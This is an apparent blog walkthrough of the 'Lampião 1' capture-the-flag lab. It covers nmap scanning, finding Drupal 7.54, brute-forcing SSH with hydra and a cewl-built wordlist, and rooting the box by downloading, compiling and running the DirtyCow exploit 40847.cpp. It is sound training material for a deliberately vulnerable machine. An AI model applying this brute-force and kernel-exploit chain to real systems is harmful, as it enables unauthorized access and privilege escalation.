Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root! This was a great machine as I learnt about a new linux vulnerability DirtyCow. Based on my experience, getting the first foothold was easy but escalating the user rights was slightly more tricky as it involved testing out a few different CVEs. Some research helped me identify which one to use, at the end of the day it’s experience with privsec which helps the most.

URL: Lampião

Difficulty: Easy

Author: Tiago Tavares


Set up the Machine with a host-only adapter and run an nmap command to discover all the hosts on the local host-only network. My interface eth1 is Host-Only on my main OS (Kali Linux).

nmap -sn


We can identify the machine with the IP, so we will scan it for open ports with nmap to a file named “nmap” with the following command:

nmap -sS -p- -A -o "nmap"


We see port 80 open so let’s visit this port with our browser. This is the webpage:


There doesn’t seem to be much, I visit port 1898 on my web browser:


According to the nmap results, there were quite a few entries in the robots.txt. I’ll run a dirb scan just to find all the paths:



First, I’ll visit the robots.txt:


The above is a snippet of just the disallowed entries. I first visited the changelog.txt path:


We can identify a service and version number:

Drupal 7.54

This is worth noting in case we need to find any vulnerabilities.

I also wanted to note the potential username “tiago” I found on one of the posts:


The URL was worth investigating as well. I tried manually navigating to another post using the URL. I changed ?q=node/1 to ?q=node/2:

node 2

Another possible user named “Eder” as highlighted in the above screenshot. There is also node 3 but no new information.

I couldn’t find much more information on the web pages of this machine so I decided to go straight to brute forcing. There are 2 possible entry points: SSH (identified from our port scan) and the web site login (no admin login page found).

Let’s try brute forcing the SSH login - create a wordlist of the 2 usernames found:


user list

I will use the following hydra command:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 ssh

-L specified a username wordlist, -P specifies the password wordlist and -t 4 threads.

The hydra command took too long so I wanted to make my wordlist, especially as this seems to be a Portuguese web server. The post @ ?q=node/1 had a lot of words so I want to use a tool called Cewl to crawl this web page and create a wordlist which I can use for my brute-force. Here is the following command:

cewl --write passwords.txt

This is the first few lines of the wordlist we have just created:


Let’s execute the hydra command again but with this new password list:

hydra -L users.txt -P passwords.txt -t 4 ssh

hydra result

We have some credentials returned = tiago:Virgulino

Let’s use this to connect via SSH:

ssh [email protected]

ssh login

We have successfully logged in as uid tiago. Nice :)

Privilege Escalation

For this machine, I will be using a script to identify any vulnerabilities on the system. This is a good script I recommend for Linux machines:

mzet Github

Let’s download this onto our local machine first:


wget script

Create a HTTP server so we can transfer this onto our victims machine:

python -m SimpleHTTPServer 8080


Now let’s transfer the files into the victims /tmp directory on our ssh shell:

cd /tmp

Make this an executable and execute it.

chmod +x


The output will be a list of possible exploits, I will be using this one in particular:


This is called dirtycow because of the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.

Dirty Cow Exploit

Here is a youtube video about this exploit.

It says the download link however it is no longer stored here. Use this website for the script:

Source Code

As we have done before, download this script onto your local machine and create a simple HTTP server:

wget 40847.cpp
python -m SimpleHTTPServer 8080


Now transfer this file onto the /tmp directory of the victims PC:

mv 40847 40847.cpp


Now that we have our script 40847.cpp ready, let’s compile the file:

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil


We now need to execute “dcow”:



We have been told the root password has been changed to: dirtyCowFun. Let’s change to root:

su root

We are now logged in as root!


cd /root
cat flag.txt
Written on May 28, 2020